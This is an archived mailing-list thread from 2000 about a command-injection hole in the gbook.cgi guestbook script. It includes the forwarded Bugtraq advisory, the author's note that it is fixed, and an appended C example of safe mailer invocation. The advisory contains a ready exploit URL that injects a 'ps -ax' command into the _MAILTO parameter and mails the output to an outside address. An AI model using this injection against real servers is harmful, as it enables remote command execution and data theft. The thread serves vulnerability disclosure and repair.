Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick (nbsSONIC.NET)
Date: Sat Nov 11 2000 - 21:00:58 CST


So far as I can tell, it's fixed... Please let me know if anyone
sees any other glaring holes. It IS rather ancient software.

-bill!

Forwarded message:
> From mbrennenfni.com Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennenfni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennenfni.com>
> To: William Kendrick <nbssonic.net>
> Cc: mathacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
> (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
> -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly! My zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> > ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now. There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > > -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <matIVNTECH.COM>
> > > To: BUGTRAQSECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > > Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > > GBook - A web site guestbook
> > > By Bill Kendrick
> > > kendrickzippy.sonoma.edu
> > > http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mathacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > > gbook.cgi is used by some web sites.
> > > We can set _MAILTO parameter, and popen is called to execute mail command.
> > > If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > > It's so trivial. :)
> > > 7. Exploits
> > > This exploit executes "ps -ax" command and sends the result to hahayaho.com.
> > >
> > > wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20hahayaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fweyaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > | mathacksware.com |
> > > | http://hacksware.com |
> > > =================================================
> > >
> > >
> >
>
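
The report above attributes the bug to _MAILTO reaching popen() unfiltered. The following is an added example, not part of the thread and not gbook's actual fix: one way to close that class of hole is to allowlist the address and hand it to the mailer as an argv element with no shell. The names mailto_is_safe and send_notice are hypothetical, and the mailer path is an assumption supplied by the caller (for example /usr/sbin/sendmail).

```c
#include <ctype.h>
#include <signal.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern the report describes (constructed here, not gbook's source):
 *   sprintf(cmd, "mail %s", mailto); fp = popen(cmd, "w");
 * popen() runs cmd through /bin/sh, so ';' and '|' in mailto start new commands. */

/* Allowlist: exactly one '@', otherwise only [A-Za-z0-9._+-], no leading '-'. */
int mailto_is_safe(const char *addr)
{
    size_t len = strlen(addr), at = 0, i;
    if (len == 0 || len > 254 || addr[0] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c == '@') { at++; continue; }
        if (!isalnum(c) && !strchr("._+-", c))
            return 0;
    }
    return at == 1 && addr[0] != '@' && addr[len - 1] != '@';
}

/* Pipe body to the mailer; the recipient is one argv element, never shell text.
 * Returns 0 on success, -1 if the address is rejected or the mailer fails. */
int send_notice(const char *mailer, const char *addr, const char *body)
{
    int fds[2], status;
    pid_t pid;
    ssize_t n;
    if (!mailto_is_safe(addr) || pipe(fds) != 0)
        return -1;                       /* rejected before any process starts */
    if ((pid = fork()) < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                      /* child: stdin comes from the pipe */
        char *argv[] = { (char *)mailer, "-i", "--", (char *)addr, NULL };
        dup2(fds[0], STDIN_FILENO);
        close(fds[0]); close(fds[1]);
        execv(mailer, argv);             /* no /bin/sh involved */
        _exit(127);
    }
    close(fds[0]);
    signal(SIGPIPE, SIG_IGN);            /* a dead mailer must not kill the CGI */
    n = write(fds[1], body, strlen(body));
    close(fds[1]);
    if (waitpid(pid, &status, 0) < 0 || n != (ssize_t)strlen(body)) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

The leading '-' check and the "--" argument keep a hostile value from being read as a mailer option even though no shell is involved.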